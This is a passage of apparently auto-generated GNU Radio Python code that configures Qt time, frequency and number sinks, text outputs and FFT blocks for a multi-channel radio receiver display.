alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_0_win, 0, 2, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN1", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_0_win, 0, 1, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1_0 = qtgui.time_sink_f(
int(samp_rate*150e-6), #size
int(samp_rate), #samp_rate
"CHAN0", #name
2 #number of inputs
)
self.qtgui_time_sink_x_0_1_0.set_update_time(0.01)
self.qtgui_time_sink_x_0_1_0.set_y_axis(0, 1)
self.qtgui_time_sink_x_0_1_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_TAG, qtgui.TRIG_SLOPE_POS, 0, 1.25e-6, 0, "burst")
self.qtgui_time_sink_x_0_1_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_1_0.enable_grid(True)
self.qtgui_time_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_1_0.enable_stem_plot(False)
if not False:
self.qtgui_time_sink_x_0_1_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [0, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(2):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_3.addWidget(self._qtgui_time_sink_x_0_1_0_win, 0, 0, 1, 1)
for r in range(0, 1):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_1 = qtgui.time_sink_f(
8192, #size
samp_rate, #samp_rate
"", #name
4 #number of inputs
)
self.qtgui_time_sink_x_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, thresh, trig_delay, trig_channel, "")
self.qtgui_time_sink_x_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_1.disable_legend()
labels = ['Chan0', 'Chan1', 'Chan2', 'Chan3', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_1.addWidget(self._qtgui_time_sink_x_0_1_win, 0, 0, 1, 4)
for r in range(0, 1):
self.main_tab_grid_layout_1.setRowStretch(r, 1)
for c in range(0, 4):
self.main_tab_grid_layout_1.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_1 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_1.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_1.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_1.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_1.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_1.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_1.enable_grid(False)
self.qtgui_time_sink_x_0_0_1.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_1.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_1.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_1.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_1.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_1.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_1.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_1.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_1.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_1.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_1_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_1_win, 4, 3, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_0_win, 4, 2, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0_0.set_update_time(0.010)
self.qtgui_time_sink_x_0_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0_0.enable_autoscale(True)
self.qtgui_time_sink_x_0_0.enable_grid(False)
self.qtgui_time_sink_x_0_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0_0.enable_control_panel(False)
self.qtgui_time_sink_x_0_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_0_win, 4, 1, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_time_sink_x_0 = qtgui.time_sink_f(
1024, #size
samp_rate, #samp_rate
"", #name
1 #number of inputs
)
self.qtgui_time_sink_x_0.set_update_time(0.010)
self.qtgui_time_sink_x_0.set_y_axis(-1, 1)
self.qtgui_time_sink_x_0.set_y_label('Amplitude', "")
self.qtgui_time_sink_x_0.enable_tags(-1, True)
self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, thresh, 0, 0, "")
self.qtgui_time_sink_x_0.enable_autoscale(True)
self.qtgui_time_sink_x_0.enable_grid(False)
self.qtgui_time_sink_x_0.enable_axis_labels(True)
self.qtgui_time_sink_x_0.enable_control_panel(False)
self.qtgui_time_sink_x_0.enable_stem_plot(False)
if not True:
self.qtgui_time_sink_x_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "blue"]
styles = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
markers = [-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_time_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_time_sink_x_0.set_line_label(i, labels[i])
self.qtgui_time_sink_x_0.set_line_width(i, widths[i])
self.qtgui_time_sink_x_0.set_line_color(i, colors[i])
self.qtgui_time_sink_x_0.set_line_style(i, styles[i])
self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])
self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_time_sink_x_0_win, 4, 0, 2, 1)
for r in range(4, 6):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_number_sink_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_NONE,
3
)
self.qtgui_number_sink_0.set_update_time(0.10)
self.qtgui_number_sink_0.set_title("samp_offset")
labels = ['0 to 1', '0 to 2', '0 to 3', '', '',
'', '', '', '', '']
units = ['samples', 'samples', 'samples', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(3):
self.qtgui_number_sink_0.set_min(i, -1)
self.qtgui_number_sink_0.set_max(i, 1)
self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0.set_label(i, labels[i])
self.qtgui_number_sink_0.set_unit(i, units[i])
self.qtgui_number_sink_0.set_factor(i, factor[i])
self.qtgui_number_sink_0.enable_autoscale(False)
self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_2.addWidget(self._qtgui_number_sink_0_win, 9, 0, 1, 3)
for r in range(9, 10):
self.main_tab_grid_layout_2.setRowStretch(r, 1)
for c in range(0, 3):
self.main_tab_grid_layout_2.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1_0.enable_grid(False)
self.qtgui_freq_sink_x_0_1_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_1_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_0_win, 0, 3, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_1 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_1.set_update_time(0.010)
self.qtgui_freq_sink_x_0_1.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_1.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_1.enable_autoscale(False)
self.qtgui_freq_sink_x_0_1.enable_grid(False)
self.qtgui_freq_sink_x_0_1.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_1.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_1.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_1.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_1.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_1.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_1.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_1.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_1.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_1.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_1_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_1.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_1_win, 0, 2, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0_0.enable_grid(False)
self.qtgui_freq_sink_x_0_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_0_win, 0, 1, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_freq_sink_x_0 = qtgui.freq_sink_c(
1024, #size
firdes.WIN_BLACKMAN_hARRIS, #wintype
0, #fc
samp_rate, #bw
"", #name
1 #number of inputs
)
self.qtgui_freq_sink_x_0.set_update_time(0.010)
self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)
self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')
self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, "")
self.qtgui_freq_sink_x_0.enable_autoscale(False)
self.qtgui_freq_sink_x_0.enable_grid(False)
self.qtgui_freq_sink_x_0.set_fft_average(1.0)
self.qtgui_freq_sink_x_0.enable_axis_labels(True)
self.qtgui_freq_sink_x_0.enable_control_panel(False)
if not False:
self.qtgui_freq_sink_x_0.disable_legend()
if "complex" == "float" or "complex" == "msg_float":
self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_freq_sink_x_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])
self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])
self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])
self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])
self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)
self.main_tab_grid_layout_0.addWidget(self._qtgui_freq_sink_x_0_win, 0, 0, 2, 1)
for r in range(0, 2):
self.main_tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_0.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0_0;
self.main_tab_grid_layout_4.addWidget(self._pyqt_meta_text_output_0_0_0_0_0_win, 4, 4, 4, 2)
for r in range(4, 8):
self.main_tab_grid_layout_4.setRowStretch(r, 1)
for c in range(4, 6):
self.main_tab_grid_layout_4.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_0_win = self.pyqt_meta_text_output_0_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_0_win, 1, 3, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(3, 4):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_0_win = self.pyqt_meta_text_output_0_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_0_win, 1, 2, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(2, 3):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_0_win = self.pyqt_meta_text_output_0_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_0_win, 1, 1, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(1, 2):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.pyqt_meta_text_output_0 = pyqt.meta_text_output()
self._pyqt_meta_text_output_0_win = self.pyqt_meta_text_output_0;
self.main_tab_grid_layout_3.addWidget(self._pyqt_meta_text_output_0_win, 1, 0, 1, 1)
for r in range(1, 2):
self.main_tab_grid_layout_3.setRowStretch(r, 1)
for c in range(0, 1):
self.main_tab_grid_layout_3.setColumnStretch(c, 1)
self.fft_vxx_1_0_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1_0 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
self.fft_vxx_1 = fft.fft_vcc(nfft, True, (window.blackmanharris(nfft)), True, 1)
